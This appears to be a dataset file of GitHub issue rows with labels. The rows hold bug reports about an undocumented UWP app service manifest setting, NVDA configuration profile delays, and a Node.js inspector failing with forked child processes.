* ID: edde9dbc-6e04-69cf-206e-123792666abf
* Version Independent ID: 9894e78f-3270-9485-4769-11050669b805
* Content: [Create and consume an app service - UWP applications](https://learn.microsoft.com/en-us/windows/uwp/launch-resume/how-to-create-and-consume-an-app-service)
* Content Source: [uwp/launch-resume/how-to-create-and-consume-an-app-service.md](https://github.com/MicrosoftDocs/windows-dev-docs/blob/docs/uwp/launch-resume/how-to-create-and-consume-an-app-service.md)
* Product: **uwp**
* Technology: **processes-and-threading**
* GitHub Login: @alvinashcraft
* Microsoft Alias: **aashcraft** | 1.0 | "Create and consume an app service" out of date? Undocumented "ExecutableOrStartPageIsRequired" setting. - I am trying to follow the tutorial [Create and consume an app service](https://learn.microsoft.com/en-us/windows/uwp/launch-resume/how-to-create-and-consume-an-app-service) but can't get the ClientApp to successfully connect to the app service after deploying the service (instead I get back the status "AppNotInstalled"). I've gone through the "General app service troubleshooting" steps about a dozen times and verified everything is correct, but still can't get the client to connect.
The tutorial has us manually add the app service declaration to the raw `Package.appxmanifest` XML. Afterward, the declaration is visible in the "Declarations" tab of the appxmanifest GUI Editor:

I notice there is a toggle field "ExecutableOrStartPageIsRequired" which is selected by default. We can deselect this, but the change isn't saved - if we close and re-open the manifest, the box will be selected again. In other words, this setting can't be turned off. Doing a web search for "ExecutableOrStartPageIsRequired" only returns a few hits; **it seems this setting isn't documented by Microsoft**.
Because the ExecutableOrStartPageIsRequired setting can't be turned off, it follows that we are required to fill in either the Executable field or Start Page field. However, these fields are not covered in the tutorial. Are we actually required to fill in the Executable or Start Page field? Is there a way to actually disable the "ExecutableOrStartPageIsRequired" option?
---
#### Document Details
⚠ *Do not edit this section. It is required for learn.microsoft.com ➟ GitHub issue linking.*
* ID: edde9dbc-6e04-69cf-206e-123792666abf
* Version Independent ID: 9894e78f-3270-9485-4769-11050669b805
* Content: [Create and consume an app service - UWP applications](https://learn.microsoft.com/en-us/windows/uwp/launch-resume/how-to-create-and-consume-an-app-service)
* Content Source: [uwp/launch-resume/how-to-create-and-consume-an-app-service.md](https://github.com/MicrosoftDocs/windows-dev-docs/blob/docs/uwp/launch-resume/how-to-create-and-consume-an-app-service.md)
* Product: **uwp**
* Technology: **processes-and-threading**
* GitHub Login: @alvinashcraft
* Microsoft Alias: **aashcraft** | process | create and consume an app service out of date undocumented executableorstartpageisrequired setting i am trying to follow the tutorial but can t get the clientapp to successfully connect to the app service after deploying the service instead i get back the status appnotinstalled i ve gone through the general app service troubleshooting steps about a dozen times and verified everything is correct but still can t get the client to connect the tutorial has us manually add the app service declaration to the raw package appxmanifest xml afterward the declaration is visible in the declarations tab of the appxmanifest gui editor i notice there is a toggle field executableorstartpageisrequired which is selected by default we can deselect this but the change isn t saved if we close and re open the manifest the box will be selected again in other words this setting can t be turned off doing a web search for executableorstartpageisrequired only returns a few hits it seems this setting isn t documented by microsoft because the executableorstartpageisrequired setting can t be turned off it follows that we are required to fill in either the executable field or start page field however these fields are not covered in the tutorial are we actually required to fill in the executable or start page field is there a way to actually disable the executableorstartpageisrequired option document details ⚠ do not edit this section it is required for learn microsoft com ➟ github issue linking id version independent id content content source product uwp technology processes and threading github login alvinashcraft microsoft alias aashcraft | 1 |
12,752 | 7,974,719,515 | IssuesEvent | 2018-07-17 06:57:14 | nvaccess/nvda | https://api.github.com/repos/nvaccess/nvda | closed | Delay of around 7 seconds when changing to application using configuration profiles other than normal | Braille Configuration profiles performance | Example:
1. Open Firefox
2. Visit Configuration profiles from NVDA.
3. Create a new profile called Web and assign it to the application.
When switching between Firefox and other applications, significant delays are encountered.
This is true of any application for which a separate config profile is created, e.g. Microsoft Word.
This behaviour has been observed
in NExt and Master builds of NVDA this week. Behaviour does not occur NVDA 2017.4. Behaviour is present in NVDA 2018.1 RC1.
| True | Delay of around 7 seconds when changing to application using configuration profiles other than normal - Example:
1. Open Firefox
2. Visit Configuration profiles from NVDA.
3. Create a new profile called Web and assign it to the application.
When switching between Firefox and other applications, significant delays are encountered.
This is true of any application for which a separate config profile is created, e.g. Microsoft Word.
This behaviour has been observed
in NExt and Master builds of NVDA this week. Behaviour does not occur NVDA 2017.4. Behaviour is present in NVDA 2018.1 RC1.
| non_process | delay of around seconds when changing to application using configuration profiles other than normal example open firefox visit configuration profiles from nvda create a new profile called web and assign it to the application when switching between firefox and other applications significant delays are encountered this is true of any application for which a separate config profile is created e g microsoft word this behaviour has been observed in next and master builds of nvda this week behaviour does not occur nvda behaviour is present in nvda | 0 |
34,497 | 4,930,967,516 | IssuesEvent | 2016-11-28 08:29:09 | wangding/courses | https://api.github.com/repos/wangding/courses | closed | 13.4 提交黑盒测试案例结果 | testing learning | 在 github 的问题描述或者问题更新的描述中,以表格的方式任务13.3所有设计好的测试案例。
请注意问题描述中表格的格式要求,表格的行数取决于测试案例的数量,表格的列数必须和问题模板的列数一致 | 1.0 | 13.4 提交黑盒测试案例结果 - 在 github 的问题描述或者问题更新的描述中,以表格的方式任务13.3所有设计好的测试案例。
请注意问题描述中表格的格式要求,表格的行数取决于测试案例的数量,表格的列数必须和问题模板的列数一致 | non_process | 提交黑盒测试案例结果 在 github 的问题描述或者问题更新的描述中, 。 请注意问题描述中表格的格式要求,表格的行数取决于测试案例的数量,表格的列数必须和问题模板的列数一致 | 0 |
36,535 | 17,777,134,923 | IssuesEvent | 2021-08-30 20:48:38 | FRRouting/frr | https://api.github.com/repos/FRRouting/frr | closed | frr-7.0-10.el8.x86_64 and 100% usage CPU past start before ~30min. | performance triage | This day i was upgrade frr-7.0-5.el8.x86_64 to frr-7.0-10.el8.x86_64 and past start FRR have 100% usage CPU before about 30min.
On version frr-7.0-5.el8.x86_64 all was ok.
To Reproduce
1. dnf update
**Screenshots**
```
Tasks: 131 total, 3 running, 128 sleeping, 0 stopped, 0 zombie
%Cpu0 : 0,3 us, 0,7 sy, 0,0 ni, 98,3 id, 0,7 wa, 0,0 hi, 0,0 si, 0,0 st
%Cpu1 : 22,7 us, 74,7 sy, 0,0 ni, 2,3 id, 0,0 wa, 0,0 hi, 0,3 si, 0,0 st
%Cpu2 : 0,3 us, 1,3 sy, 0,0 ni, 69,2 id, 0,0 wa, 1,7 hi, 27,4 si, 0,0 st
%Cpu3 : 0,0 us, 0,0 sy, 0,0 ni, 26,4 id, 0,0 wa, 2,0 hi, 71,6 si, 0,0 st
MiB Mem : 7782,4 total, 2407,4 free, 1612,0 used, 3763,1 buff/cache
MiB Swap: 1024,0 total, 1024,0 free, 0,0 used. 5460,4 avail Mem
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
131232 frr 15 -5 902276 697404 3816 R 99,3 8,8 22:15.96 bgpd
[...]
```
past about 30min i see:
```
Tasks: 134 total, 1 running, 132 sleeping, 0 stopped, 1 zombie
%Cpu(s): 0,2 us, 0,2 sy, 0,0 ni, 76,7 id, 0,0 wa, 1,1 hi, 21,8 si, 0,0 st
MiB Mem : 7782,4 total, 2413,0 free, 1599,1 used, 3770,3 buff/cache
MiB Swap: 1024,0 total, 1024,0 free, 0,0 used. 5477,5 avail Mem
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
29127 rngd 20 0 381428 6944 6108 S 0,7 0,1 68:25.86 rngd
10 root 20 0 0 0 0 I 0,3 0,0 23:25.12 rcu_sched
611 root 20 0 184288 75508 73716 S 0,3 0,9 69:55.56 systemd-journal
73735 root 20 0 535004 29340 25544 S 0,3 0,4 0:11.66 rsyslogd
131222 frr 15 -5 818832 523584 2880 S 0,3 6,6 0:31.34 zebra
131232 frr 15 -5 902276 697404 3816 S 0,3 8,8 23:56.76 bgpd
[...]
I was trying manualy:
1. systemct stop frr
2. systemct start frr
and this same about 30min CPU usage 100% one core.
```
```
root@gateway rc.d]# systemctl status frr
● frr.service - FRRouting (FRR)
Loaded: loaded (/usr/lib/systemd/system/frr.service; enabled; vendor preset: disabled)
Active: active (running) since Mon 2020-12-14 10:55:31 CET; 42min ago
Process: 131068 ExecStop=/usr/lib/frr/frr stop (code=exited, status=0/SUCCESS)
Process: 131203 ExecStart=/usr/lib/frr/frr start (code=exited, status=0/SUCCESS)
Tasks: 8 (limit: 49614)
Memory: 1.1G
CGroup: /system.slice/frr.service
├─131222 /usr/lib/frr/zebra -d -A 127.0.0.1
├─131232 /usr/lib/frr/bgpd -d -A 127.0.0.1
└─131247 /usr/lib/frr/watchfrr -d -r /usr/lib/frr/frr restart %s -s /usr/lib/frr/frr start %s -k /usr/lib/frr/frr stop %s zebra bgpd
gru 14 10:55:31 gateway.localdomain frr[131203]: 2020/12/14 10:55:31 warnings: ZEBRA: [EC 4043309105] Disabling MPLS support (no kernel support)
gru 14 10:55:31 gateway.localdomain frr[131203]: [ OK ]
gru 14 10:55:31 gateway.localdomain frr[131203]: bgpd [ OK ]
gru 14 10:55:31 gateway.localdomain frr[131203]: Starting FRRouting monitor daemon:
gru 14 10:55:31 gateway.localdomain watchfrr[131247]: watchfrr 7.0 starting: vty@0
gru 14 10:55:31 gateway.localdomain watchfrr[131247]: zebra state -> up : connect succeeded
gru 14 10:55:31 gateway.localdomain watchfrr[131247]: bgpd state -> up : connect succeeded
gru 14 10:55:31 gateway.localdomain watchfrr[131247]: all daemons up, doing startup-complete notify
gru 14 10:55:31 gateway.localdomain frr[131203]: watchfrr[ OK ]
gru 14 10:55:31 gateway.localdomain systemd[1]: Started FRRouting (FRR).
```
```
in logs /var/log/frrr i don't see any error and warnings
```
**Versions**
- OS Version: Centos 8
- Kernel:
```
uname -a
Linux gateway.localdomain 4.18.0-193.19.1.el8_2.x86_64 #1 SMP Mon Sep 14 14:37:00 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
```
- FRR Version: frr-7.0-10.el8.x86_64
**Additional context**
What is it wrong with this update FRR? | True | frr-7.0-10.el8.x86_64 and 100% usage CPU past start before ~30min. - This day i was upgrade frr-7.0-5.el8.x86_64 to frr-7.0-10.el8.x86_64 and past start FRR have 100% usage CPU before about 30min.
On version frr-7.0-5.el8.x86_64 all was ok.
To Reproduce
1. dnf update
**Screenshots**
```
Tasks: 131 total, 3 running, 128 sleeping, 0 stopped, 0 zombie
%Cpu0 : 0,3 us, 0,7 sy, 0,0 ni, 98,3 id, 0,7 wa, 0,0 hi, 0,0 si, 0,0 st
%Cpu1 : 22,7 us, 74,7 sy, 0,0 ni, 2,3 id, 0,0 wa, 0,0 hi, 0,3 si, 0,0 st
%Cpu2 : 0,3 us, 1,3 sy, 0,0 ni, 69,2 id, 0,0 wa, 1,7 hi, 27,4 si, 0,0 st
%Cpu3 : 0,0 us, 0,0 sy, 0,0 ni, 26,4 id, 0,0 wa, 2,0 hi, 71,6 si, 0,0 st
MiB Mem : 7782,4 total, 2407,4 free, 1612,0 used, 3763,1 buff/cache
MiB Swap: 1024,0 total, 1024,0 free, 0,0 used. 5460,4 avail Mem
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
131232 frr 15 -5 902276 697404 3816 R 99,3 8,8 22:15.96 bgpd
[...]
```
past about 30min i see:
```
Tasks: 134 total, 1 running, 132 sleeping, 0 stopped, 1 zombie
%Cpu(s): 0,2 us, 0,2 sy, 0,0 ni, 76,7 id, 0,0 wa, 1,1 hi, 21,8 si, 0,0 st
MiB Mem : 7782,4 total, 2413,0 free, 1599,1 used, 3770,3 buff/cache
MiB Swap: 1024,0 total, 1024,0 free, 0,0 used. 5477,5 avail Mem
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
29127 rngd 20 0 381428 6944 6108 S 0,7 0,1 68:25.86 rngd
10 root 20 0 0 0 0 I 0,3 0,0 23:25.12 rcu_sched
611 root 20 0 184288 75508 73716 S 0,3 0,9 69:55.56 systemd-journal
73735 root 20 0 535004 29340 25544 S 0,3 0,4 0:11.66 rsyslogd
131222 frr 15 -5 818832 523584 2880 S 0,3 6,6 0:31.34 zebra
131232 frr 15 -5 902276 697404 3816 S 0,3 8,8 23:56.76 bgpd
[...]
I was trying manualy:
1. systemct stop frr
2. systemct start frr
and this same about 30min CPU usage 100% one core.
```
```
root@gateway rc.d]# systemctl status frr
● frr.service - FRRouting (FRR)
Loaded: loaded (/usr/lib/systemd/system/frr.service; enabled; vendor preset: disabled)
Active: active (running) since Mon 2020-12-14 10:55:31 CET; 42min ago
Process: 131068 ExecStop=/usr/lib/frr/frr stop (code=exited, status=0/SUCCESS)
Process: 131203 ExecStart=/usr/lib/frr/frr start (code=exited, status=0/SUCCESS)
Tasks: 8 (limit: 49614)
Memory: 1.1G
CGroup: /system.slice/frr.service
├─131222 /usr/lib/frr/zebra -d -A 127.0.0.1
├─131232 /usr/lib/frr/bgpd -d -A 127.0.0.1
└─131247 /usr/lib/frr/watchfrr -d -r /usr/lib/frr/frr restart %s -s /usr/lib/frr/frr start %s -k /usr/lib/frr/frr stop %s zebra bgpd
gru 14 10:55:31 gateway.localdomain frr[131203]: 2020/12/14 10:55:31 warnings: ZEBRA: [EC 4043309105] Disabling MPLS support (no kernel support)
gru 14 10:55:31 gateway.localdomain frr[131203]: [ OK ]
gru 14 10:55:31 gateway.localdomain frr[131203]: bgpd [ OK ]
gru 14 10:55:31 gateway.localdomain frr[131203]: Starting FRRouting monitor daemon:
gru 14 10:55:31 gateway.localdomain watchfrr[131247]: watchfrr 7.0 starting: vty@0
gru 14 10:55:31 gateway.localdomain watchfrr[131247]: zebra state -> up : connect succeeded
gru 14 10:55:31 gateway.localdomain watchfrr[131247]: bgpd state -> up : connect succeeded
gru 14 10:55:31 gateway.localdomain watchfrr[131247]: all daemons up, doing startup-complete notify
gru 14 10:55:31 gateway.localdomain frr[131203]: watchfrr[ OK ]
gru 14 10:55:31 gateway.localdomain systemd[1]: Started FRRouting (FRR).
```
```
in logs /var/log/frrr i don't see any error and warnings
```
**Versions**
- OS Version: Centos 8
- Kernel:
```
uname -a
Linux gateway.localdomain 4.18.0-193.19.1.el8_2.x86_64 #1 SMP Mon Sep 14 14:37:00 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
```
- FRR Version: frr-7.0-10.el8.x86_64
**Additional context**
What is it wrong with this update FRR? | non_process | frr and usage cpu past start before this day i was upgrade frr to frr and past start frr have usage cpu before about on version frr all was ok to reproduce dnf update screenshots tasks total running sleeping stopped zombie us sy ni id wa hi si st us sy ni id wa hi si st us sy ni id wa hi si st us sy ni id wa hi si st mib mem total free used buff cache mib swap total free used avail mem pid user pr ni virt res shr s cpu mem time command frr r bgpd past about i see tasks total running sleeping stopped zombie cpu s us sy ni id wa hi si st mib mem total free used buff cache mib swap total free used avail mem pid user pr ni virt res shr s cpu mem time command rngd s rngd root i rcu sched root s systemd journal root s rsyslogd frr s zebra frr s bgpd i was trying manualy systemct stop frr systemct start frr and this same about cpu usage one core root gateway rc d systemctl status frr ● frr service frrouting frr loaded loaded usr lib systemd system frr service enabled vendor preset disabled active active running since mon cet ago process execstop usr lib frr frr stop code exited status success process execstart usr lib frr frr start code exited status success tasks limit memory cgroup system slice frr service ├─ usr lib frr zebra d a ├─ usr lib frr bgpd d a └─ usr lib frr watchfrr d r usr lib frr frr restart s s usr lib frr frr start s k usr lib frr frr stop s zebra bgpd gru gateway localdomain frr warnings zebra disabling mpls support no kernel support gru gateway localdomain frr gru gateway localdomain frr bgpd gru gateway localdomain frr starting frrouting monitor daemon gru gateway localdomain watchfrr watchfrr starting vty gru gateway localdomain watchfrr zebra state up connect succeeded gru gateway localdomain watchfrr bgpd state up connect succeeded gru gateway localdomain watchfrr all daemons up doing startup complete notify gru gateway localdomain frr watchfrr gru gateway localdomain systemd started frrouting frr in logs var log frrr i don t see any error and warnings versions os version centos kernel uname a linux gateway localdomain smp mon sep utc gnu linux frr version frr additional context what is it wrong with this update frr | 0 |
15,030 | 18,751,660,480 | IssuesEvent | 2021-11-05 03:19:32 | streamnative/pulsar-flink | https://api.github.com/repos/streamnative/pulsar-flink | closed | Check the topic's markDeletePosition and readPosition are very different | type/question platform/data-processing | Use the reader of flink-pulsar to view the topic's markDeletePosition and readPosition are very different. The log shows Successfully committed offset255271:4691:6:0 to topic, why is markDeletePosition not updated?

| 1.0 | Check the topic's markDeletePosition and readPosition are very different - Use the reader of flink-pulsar to view the topic's markDeletePosition and readPosition are very different. The log shows Successfully committed offset255271:4691:6:0 to topic, why is markDeletePosition not updated?

| process | check the topic s markdeleteposition and readposition are very different use the reader of flink pulsar to view the topic s markdeleteposition and readposition are very different the log shows successfully committed to topic why is markdeleteposition not updated | 1 |
34,189 | 2,776,137,113 | IssuesEvent | 2015-05-04 20:02:55 | rrev/Pastebin | https://api.github.com/repos/rrev/Pastebin | opened | Fix "Back button" in code paste | bug priority-important | Quando apre un paste da trending pastes or my pastes deve rimandare alla pagina precedente e non alla home | 1.0 | Fix "Back button" in code paste - Quando apre un paste da trending pastes or my pastes deve rimandare alla pagina precedente e non alla home | non_process | fix back button in code paste quando apre un paste da trending pastes or my pastes deve rimandare alla pagina precedente e non alla home | 0 |
14,032 | 16,827,644,192 | IssuesEvent | 2021-06-17 20:59:27 | googleapis/python-bigquery | https://api.github.com/repos/googleapis/python-bigquery | closed | minor: add integration test for column acls feature | api: bigquery priority: p3 testing type: process | Once the datacatalog v1 endpoint releases a version with support for the PolicyTagManager client, let's add an integration test to better exercise the column ACL feature.
[This commit](https://github.com/googleapis/googleapis/commit/91eee3d039fbdbadee008393504900287bbc6f43) to proto comments should unblock the datacatalog release. | 1.0 | minor: add integration test for column acls feature - Once the datacatalog v1 endpoint releases a version with support for the PolicyTagManager client, let's add an integration test to better exercise the column ACL feature.
[This commit](https://github.com/googleapis/googleapis/commit/91eee3d039fbdbadee008393504900287bbc6f43) to proto comments should unblock the datacatalog release. | process | minor add integration test for column acls feature once the datacatalog endpoint releases a version with support for the policytagmanager client let s add an integration test to better exercise the column acl feature to proto comments should unblock the datacatalog release | 1 |
253,837 | 19,180,718,902 | IssuesEvent | 2021-12-04 10:42:36 | Naman-5/SMSPrism | https://api.github.com/repos/Naman-5/SMSPrism | closed | Edit README.md file | documentation | - Give basic information about the project
- Tech stack used during the course of the project
- Screenshots of the front end application
- About the dataset
- How to report issue
- How to contribute to the project | 1.0 | Edit README.md file - - Give basic information about the project
- Tech stack used during the course of the project
- Screenshots of the front end application
- About the dataset
- How to report issue
- How to contribute to the project | non_process | edit readme md file give basic information about the project tech stack used during the course of the project screenshots of the front end application about the dataset how to report issue how to contribute to the project | 0 |
1,731 | 4,408,261,411 | IssuesEvent | 2016-08-12 00:36:20 | elastic/beats | https://api.github.com/repos/elastic/beats | opened | drop_event does not work in a Metricbeat module filter | :Processors bug Metricbeat v5.0.0-alpha5 | - Version: 5.0.0-alpha5
- Operating System: Any
- Steps to Reproduce:
```
metricbeat:
modules:
- module: system
metricsets: [filesystem]
period: 15s
filters:
- drop_event:
when:
regexp:
mount_point: '/dev'
output.console:
pretty: true
```
When the event is published this is what you get. Notice the `null`. What should happen is the whole event is dropped.
```
{
"@timestamp": "2016-08-11T23:03:34.988Z",
"beat": {
"hostname": "myhost",
"name": "myhost"
},
"metricset": {
"module": "system",
"name": "filesystem",
"rtt": 197
},
"system": {
"filesystem": null
},
"type": "metricsets"
}
```
| 1.0 | drop_event does not work in a Metricbeat module filter - - Version: 5.0.0-alpha5
- Operating System: Any
- Steps to Reproduce:
```
metricbeat:
modules:
- module: system
metricsets: [filesystem]
period: 15s
filters:
- drop_event:
when:
regexp:
mount_point: '/dev'
output.console:
pretty: true
```
When the event is published this is what you get. Notice the `null`. What should happen is the whole event is dropped.
```
{
"@timestamp": "2016-08-11T23:03:34.988Z",
"beat": {
"hostname": "myhost",
"name": "myhost"
},
"metricset": {
"module": "system",
"name": "filesystem",
"rtt": 197
},
"system": {
"filesystem": null
},
"type": "metricsets"
}
```
| process | drop event does not work in a metricbeat module filter version operating system any steps to reproduce metricbeat modules module system metricsets period filters drop event when regexp mount point dev output console pretty true when the event is published this is what you get notice the null what should happen is the whole event is dropped timestamp beat hostname myhost name myhost metricset module system name filesystem rtt system filesystem null type metricsets | 1 |
12,418 | 14,921,219,857 | IssuesEvent | 2021-01-23 09:02:59 | threefoldfoundation/tft-stellar | https://api.github.com/repos/threefoldfoundation/tft-stellar | closed | Make the tfta to tft service multivalidation and multisignature | process_wontfix type_feature | Questions:
- [ ] inter threebot/service communication
An easy way way would be for the iniating service running in Dubai to service and collect the signed transactions. It knows the cosigners ( can be collected from the issuer account so it can validate if the added signatures match)
A more decentralized way would be to use something like libp2p: #193
TODO:
- [ ] One infoscript/function based on a hash #195 | 1.0 | Make the tfta to tft service multivalidation and multisignature - Questions:
- [ ] inter threebot/service communication
An easy way way would be for the iniating service running in Dubai to service and collect the signed transactions. It knows the cosigners ( can be collected from the issuer account so it can validate if the added signatures match)
A more decentralized way would be to use something like libp2p: #193
TODO:
- [ ] One infoscript/function based on a hash #195 | process | make the tfta to tft service multivalidation and multisignature questions inter threebot service communication an easy way way would be for the iniating service running in dubai to service and collect the signed transactions it knows the cosigners can be collected from the issuer account so it can validate if the added signatures match a more decentralized way would be to use something like todo one infoscript function based on a hash | 1 |
19,093 | 25,147,988,869 | IssuesEvent | 2022-11-10 07:40:30 | qgis/QGIS | https://api.github.com/repos/qgis/QGIS | closed | Processing/SAGA: translate inputs to GPKG instead of SHP | Processing Feature Request | ### What is the bug or the crash?
Some algorithms don't work when the starting layer is a gpkg with a long name field.
The problem seems to be that the starting layer is exported in shapefile format, the long name is truncated, but the command still use the original layer name.
Error: executing tool [Thin Plate Spline (TIN)]
2022-01-31T20:57:49 INFO SAGA execution commands
grid_spline "Thin Plate Spline (TIN)" -TARGET_DEFINITION 0 -SHAPES "/tmp/processing_MyuIjo/1836dbcd0d794855854e7d62fbcb2995/SHAPES.shp" -FIELD "campoconnomelungo" -REGULARISATION 0.0001 -LEVEL 0 -FRAME true -TARGET_USER_SIZE 100.0 -TARGET_USER_FITS 0 -TARGET_OUT_GRID "/tmp/processing_MyuIjo/ebf9df1e7f3645338ab182ed63bdf427/TARGET_OUT_GRID.sdat"
2022-01-31T20:57:50 INFO SAGA execution console output
### Steps to reproduce the issue
- load sample data,
- open processing
- use a SAGA processing that use starting vector format, es: thin plate spline (tin)
### Versions
QGIS version | 3.23.0-Master
Qt version | 5.12.8
Python version | 3.8.10
GDAL/OGR version | 3.0.4
PROJ version | 6.3.1
EPSG Registry database version | v9.8.6 (2020-01-22)
Compiled against GEOS | 3.8.0-CAPI-1.13.1 | Running against GEOS | 3.8.0-CAPI-1.13.1
SQLite version | 3.31.1
PostgreSQL client version | 14.1 (Ubuntu 14.1-2.pgdg20.04+1)
SpatiaLite version | 4.3.0a
QWT version | 6.1.4
QScintilla2 version | 2.11.2
OS version | Ubuntu 20.04.3 LTS
Active Python plugins
qtiles | 1.7.1
db-style-manager | 0.8
OSMDownloader | 1.0.3
QuickOSM | 2.0.0
quick_map_services | 0.19.27
sagaprovider | 2.12.99
db_manager | 0.1.20
processing | 2.12.99
grassprovider | 2.12.99
### Supported QGIS version
- [X] I'm running a supported QGIS version according to the roadmap.
### New profile
- [ ] I tried with a new QGIS profile
### Additional context
[sampledata.gpkg.zip](https://github.com/qgis/QGIS/files/7973913/sampledata.gpkg.zip)
| 1.0 | Processing/SAGA: translate inputs to GPKG instead of SHP - ### What is the bug or the crash?
Some algorithms don't work when the starting layer is a gpkg with a long name field.
The problem seems to be that the starting layer is exported in shapefile format, the long name is truncated, but the command still use the original layer name.
Error: executing tool [Thin Plate Spline (TIN)]
2022-01-31T20:57:49 INFO SAGA execution commands
grid_spline "Thin Plate Spline (TIN)" -TARGET_DEFINITION 0 -SHAPES "/tmp/processing_MyuIjo/1836dbcd0d794855854e7d62fbcb2995/SHAPES.shp" -FIELD "campoconnomelungo" -REGULARISATION 0.0001 -LEVEL 0 -FRAME true -TARGET_USER_SIZE 100.0 -TARGET_USER_FITS 0 -TARGET_OUT_GRID "/tmp/processing_MyuIjo/ebf9df1e7f3645338ab182ed63bdf427/TARGET_OUT_GRID.sdat"
2022-01-31T20:57:50 INFO SAGA execution console output
### Steps to reproduce the issue
- load sample data,
- open processing
- use a SAGA processing that use starting vector format, es: thin plate spline (tin)
### Versions
QGIS version | 3.23.0-Master
Qt version | 5.12.8
Python version | 3.8.10
GDAL/OGR version | 3.0.4
PROJ version | 6.3.1
EPSG Registry database version | v9.8.6 (2020-01-22)
Compiled against GEOS | 3.8.0-CAPI-1.13.1 | Running against GEOS | 3.8.0-CAPI-1.13.1
SQLite version | 3.31.1
PostgreSQL client version | 14.1 (Ubuntu 14.1-2.pgdg20.04+1)
SpatiaLite version | 4.3.0a
QWT version | 6.1.4
QScintilla2 version | 2.11.2
OS version | Ubuntu 20.04.3 LTS
Active Python plugins
qtiles | 1.7.1
db-style-manager | 0.8
OSMDownloader | 1.0.3
QuickOSM | 2.0.0
quick_map_services | 0.19.27
sagaprovider | 2.12.99
db_manager | 0.1.20
processing | 2.12.99
grassprovider | 2.12.99
### Supported QGIS version
- [X] I'm running a supported QGIS version according to the roadmap.
### New profile
- [ ] I tried with a new QGIS profile
### Additional context
[sampledata.gpkg.zip](https://github.com/qgis/QGIS/files/7973913/sampledata.gpkg.zip)
| process | processing saga translate inputs to gpkg instead of shp what is the bug or the crash some algorithms don t work when the starting layer is a gpkg with a long name field the problem seems to be that the starting layer is exported in shapefile format the long name is truncated but the command still use the original layer name error executing tool info saga execution commands grid spline thin plate spline tin target definition shapes tmp processing myuijo shapes shp field campoconnomelungo regularisation level frame true target user size target user fits target out grid tmp processing myuijo target out grid sdat info saga execution console output steps to reproduce the issue load sample data open processing use a saga processing that use starting vector format es thin plate spline tin versions qgis version master qt version python version gdal ogr version proj version epsg registry database version compiled against geos capi running against geos capi sqlite version postgresql client version ubuntu spatialite version qwt version version os version ubuntu lts active python plugins qtiles db style manager osmdownloader quickosm quick map services sagaprovider db manager processing grassprovider supported qgis version i m running a supported qgis version according to the roadmap new profile i tried with a new qgis profile additional context | 1 |
3,658 | 6,694,644,534 | IssuesEvent | 2017-10-10 03:24:06 | york-region-tpss/stp | https://api.github.com/repos/york-region-tpss/stp | opened | Watering Assignment - Redesigning the Watering Assignment | enhancement process workflow | Design a workflow with user input on-hold items and calculated assign items | 1.0 | Watering Assignment - Redesigning the Watering Assignment - Design a workflow with user input on-hold items and calculated assign items | process | watering assignment redesigning the watering assignment design a workflow with user input on hold items and calculated assign items | 1 |
1,464 | 4,044,547,024 | IssuesEvent | 2016-05-21 11:42:58 | sysown/proxysql | https://api.github.com/repos/sysown/proxysql | closed | Add a new column mysql_query_rules.digest | ADMIN MYSQL PROTOCOL QUERY PROCESSOR ROUTING | Once a query is identified from stats_mysql_query_digest , it is sometime possible to create query rules based on it.
Identifying a query based on its digest would make processing a lot easier. | 1.0 | Add a new column mysql_query_rules.digest - Once a query is identified from stats_mysql_query_digest , it is sometime possible to create query rules based on it.
Identifying a query based on its digest would make processing a lot easier. | process | add a new column mysql query rules digest once a query is identified from stats mysql query digest it is sometime possible to create query rules based on it identifying a query based on its digest would make processing a lot easier | 1 |
16,374 | 21,089,198,720 | IssuesEvent | 2022-04-04 01:30:30 | nodejs/node | https://api.github.com/repos/nodejs/node | closed | Debugger doesn't work for processes which fork other processes | child_process feature request inspector stale | I'm running:
```
$ node --inspect some-node-script.js
```
Where `some-node-script.js` uses plain [`child_process.fork`](https://nodejs.org/api/all.html#child_process_child_process_fork_modulepath_args_options) (run with defaults mostly) calls to initialize few other processes internally. Right after that I receive message _Unable to open devtools socket: address already in use_:
```
$ node -v
v7.0.0
$ node --inspect some-node-script.js
Debugger listening on port 9229.
Warning: This is an experimental feature and could change at any time.
To start debugging, open the following URL in Chrome:
chrome-devtools://devtools/remote/serve_file/@60cd6e859b9f557d2312f5bf532f6aec5f284980/inspector.html?experiments=true&v8only=true&ws=localhost:9229/edbce9e9-0a9d-4c24-8f2b-bcaaeb4a5965
Unable to open devtools socket: address already in use
```
Also forked process crashes so technically application doesn't run (I've skipped that part of a log to avoid not related noise).
Behavior is same in both latest Node.js v7 and v6 (Tested on OSX, both El Captain and Sierra, with latest Chrome on board)
Am I doing something wrong, or there's no support currently for multi-process Node.js apps?
I've found similar [issue](https://github.com/nodejs/node/issues/8495) which states that this probably should just work, but gives no clue why it actually doesn't.
I'll be happy to provide simple test case if needed
| 1.0 | Debugger doesn't work for processes which fork other processes - I'm running:
```
$ node --inspect some-node-script.js
```
Where `some-node-script.js` uses plain [`child_process.fork`](https://nodejs.org/api/all.html#child_process_child_process_fork_modulepath_args_options) (run with defaults mostly) calls to initialize few other processes internally. Right after that I receive message _Unable to open devtools socket: address already in use_:
```
$ node -v
v7.0.0
$ node --inspect some-node-script.js
Debugger listening on port 9229.
Warning: This is an experimental feature and could change at any time.
To start debugging, open the following URL in Chrome:
chrome-devtools://devtools/remote/serve_file/@60cd6e859b9f557d2312f5bf532f6aec5f284980/inspector.html?experiments=true&v8only=true&ws=localhost:9229/edbce9e9-0a9d-4c24-8f2b-bcaaeb4a5965
Unable to open devtools socket: address already in use
```
Also forked process crashes so technically application doesn't run (I've skipped that part of a log to avoid not related noise).
Behavior is same in both latest Node.js v7 and v6 (Tested on OSX, both El Captain and Sierra, with latest Chrome on board)
Am I doing something wrong, or there's no support currently for multi-process Node.js apps?
I've found similar [issue](https://github.com/nodejs/node/issues/8495) which states that this probably should just work, but gives no clue why it actually doesn't.
I'll be happy to provide simple test case if needed
